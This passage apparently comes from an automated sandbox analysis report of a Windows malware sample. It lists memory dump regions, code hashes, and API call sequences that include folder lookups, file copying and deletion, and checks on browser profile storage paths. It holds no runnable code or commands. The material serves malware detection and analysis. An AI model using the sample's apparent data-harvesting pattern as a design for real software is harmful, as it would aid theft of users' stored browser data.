                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Zb,W
                          • API String ID: 0-43614317
                          • Opcode ID: c1a22b2f53ad595167a48206b3e7c8ff2da1eb9101a5c88c2e7cc22c10e142c4
                          • Instruction ID: 68251d83556121868fc9238b125b90df36791c0eb9b18f28ef449dccbd558213
                          • Opcode Fuzzy Hash: c1a22b2f53ad595167a48206b3e7c8ff2da1eb9101a5c88c2e7cc22c10e142c4
                          • Instruction Fuzzy Hash: 05517FF3E096145FE3046D2CDC857BAF7DAEBD4321F16863DE68583744EA7558018681
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49344e245fa2c07e3c2a8a52d6168f576e91ef942f6e5960c9731eef0b6b87a3
                          • Instruction ID: b7691460a9ed1d0a037dfb453755b94b6f9ec402384da024e9975d709cb6f98f
                          • Opcode Fuzzy Hash: 49344e245fa2c07e3c2a8a52d6168f576e91ef942f6e5960c9731eef0b6b87a3
                          • Instruction Fuzzy Hash: F67103B3A087148FF7046E28EC853A9B7E6EB84320F1B463DDED497780E97958058786
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a58951cc2309995b2f721cfa905557ef6ef4f031143b1f5b4e5be4c6e4000d67
                          • Instruction ID: f582a4e86063a2b968467246f1e65fe82539afad472fed35f65a0f206b4e8b1c
                          • Opcode Fuzzy Hash: a58951cc2309995b2f721cfa905557ef6ef4f031143b1f5b4e5be4c6e4000d67
                          • Instruction Fuzzy Hash: 905101B2608604AFE308BE29DC9577AB7E6FF94320F1A893DD6C587744EA385445CB43
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76bcc07483d76c1a3b143c245b20f11008f2f35a9685f1eb7ce84c4331163a3e
                          • Instruction ID: f73eb03736c108fa84068b84466314128630bc2a2b8e4b21b946f70f01480189
                          • Opcode Fuzzy Hash: 76bcc07483d76c1a3b143c245b20f11008f2f35a9685f1eb7ce84c4331163a3e
                          • Instruction Fuzzy Hash: 7141B7F3E082009FF315AE29DD8176ABBD6EBD4310F16853DDBD893384EA7958058786
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00638636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 006386AA
                          • StrStrA.SHLWAPI(?,0129DB58), ref: 006386CF
                          • lstrcpyn.KERNEL32(008593D0,?,00000000), ref: 006386EE
                          • lstrlen.KERNEL32(?), ref: 00638701
                          • wsprintfA.USER32 ref: 00638711
                          • lstrcpy.KERNEL32(?,?), ref: 00638727
                          • StrStrA.SHLWAPI(?,0129DA50), ref: 00638754
                          • lstrcpy.KERNEL32(?,008593D0), ref: 006387B4
                          • StrStrA.SHLWAPI(?,0129D990), ref: 006387E1
                          • lstrcpyn.KERNEL32(008593D0,?,00000000), ref: 00638800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: df3f96a1b815e4035c36ca1ffc66e0f76adeef2396e871f97a5644db63b558dc
                          • Instruction ID: 8e801c372aab83597ac6d5b7203f92e66eb348535d18a477d0413b5c292cbe23
                          • Opcode Fuzzy Hash: df3f96a1b815e4035c36ca1ffc66e0f76adeef2396e871f97a5644db63b558dc
                          • Instruction Fuzzy Hash: 0BF13872900614EFCB10DB68DD49ADAB7BAFF88342F144599F949E3351DF34AE058BA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00621F9F
                          • lstrlen.KERNEL32(01298B40), ref: 00621FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00621FE3
                          • lstrlen.KERNEL32(00651794), ref: 00621FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062200E
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00622042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062204D
                          • lstrlen.KERNEL32(00651794), ref: 00622058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622075
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006220AC
                          • lstrlen.KERNEL32(?), ref: 006220E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622104
                          • lstrcat.KERNEL32(00000000,?), ref: 00622112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622139
                          • lstrlen.KERNEL32(00651794), ref: 0062214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062216B
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00622177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006221A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006221D4
                          • lstrlen.KERNEL32(?), ref: 006221EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00622218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622242
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062227F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006222B1
                          • lstrcat.KERNEL32(00000000,0129CEA8), ref: 006222B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006222F7
                          • lstrcat.KERNEL32(00000000), ref: 00622304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00622356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00622382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006223BF
                          • DeleteFileA.KERNEL32(00000000), ref: 006223F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00622444
                          • FindClose.KERNEL32(00000000), ref: 00622453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: ab6e23f8df4228cb3036004d271d60e4cf9c1198e0d33ca52c86df410bc63c94
                          • Instruction ID: 6f645b9d6fd11fa2a7fdcb5c5bea3407c159b7a3803fcdf5e8a9ec6672843c24
                          • Opcode Fuzzy Hash: ab6e23f8df4228cb3036004d271d60e4cf9c1198e0d33ca52c86df410bc63c94
                          • Instruction Fuzzy Hash: 84E19F70A11A27ABCB61EF65EC99ADE77BABF04301F040128F805A7615DB38DD45CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636445
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006364AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006364E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: be04e3535b2ccd3560c304d0e733b9902c40fcbe11e8eaab5bcabefd986b6974
                          • Instruction ID: 87a4a32b9c530f65ff16fcdb91380ba2e681f8f1909b729e9e3a87496e044b9c
                          • Opcode Fuzzy Hash: be04e3535b2ccd3560c304d0e733b9902c40fcbe11e8eaab5bcabefd986b6974
                          • Instruction Fuzzy Hash: 9CF1AD70D01A26ABCB61AF65E85AAEE77B6AF04301F048128F849D7351DB38DC45CFD4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006343A3
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006343D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 006343FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00634414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0063443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634498
                          • lstrcpy.KERNEL32(00000000,?), ref: 006344D7
                          • lstrcat.KERNEL32(00000000,?), ref: 006344DF
                          • lstrlen.KERNEL32(00651794), ref: 006344EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634507
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00634513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0063451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00634547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 006345A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 006345A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063467B
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006346AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 1d1e8adb9bc23fb95ed30400bb9935c0e57d096d91721c31475cc82a545b3a86
                          • Instruction ID: f7162a7ea6b2060ca7024780120e189ceca19fdc28f6b2b11b59f5e1e135060d
                          • Opcode Fuzzy Hash: 1d1e8adb9bc23fb95ed30400bb9935c0e57d096d91721c31475cc82a545b3a86
                          • Instruction Fuzzy Hash: 2BB1A370A11A26ABCB61EF75EC5AADEB7AAAF00301F041128F845D7751DF38EC458BD4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006357D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00635804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006358C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006358D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006358F8
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635988
                          • lstrlen.KERNEL32(00651794), ref: 0063599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006359B9
                          • lstrcat.KERNEL32(00000000,00651794), ref: 006359C5
                          • lstrlen.KERNEL32(0129CED8), ref: 006359D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006359F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00635A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00635A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635BB5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00635BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00635C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00635C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 2d3bf161d34f9c029443e772bbeea8bcab67a9152da7f9cbd75d4c6a8e3cd353
                          • Instruction ID: 64bc3183c81c95c972c5c8552b9351e72714d90f528f6368c9421cfca1abd30f
                          • Opcode Fuzzy Hash: 2d3bf161d34f9c029443e772bbeea8bcab67a9152da7f9cbd75d4c6a8e3cd353
                          • Instruction Fuzzy Hash: 4202B170A11A26AFCB21EF69D899AEE77F6BF44300F044128F84A97350DB38DD458BD4
                          APIs
                            • Part of subcall function 00621120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00621135
                            • Part of subcall function 00621120: RtlAllocateHeap.NTDLL(00000000), ref: 0062113C
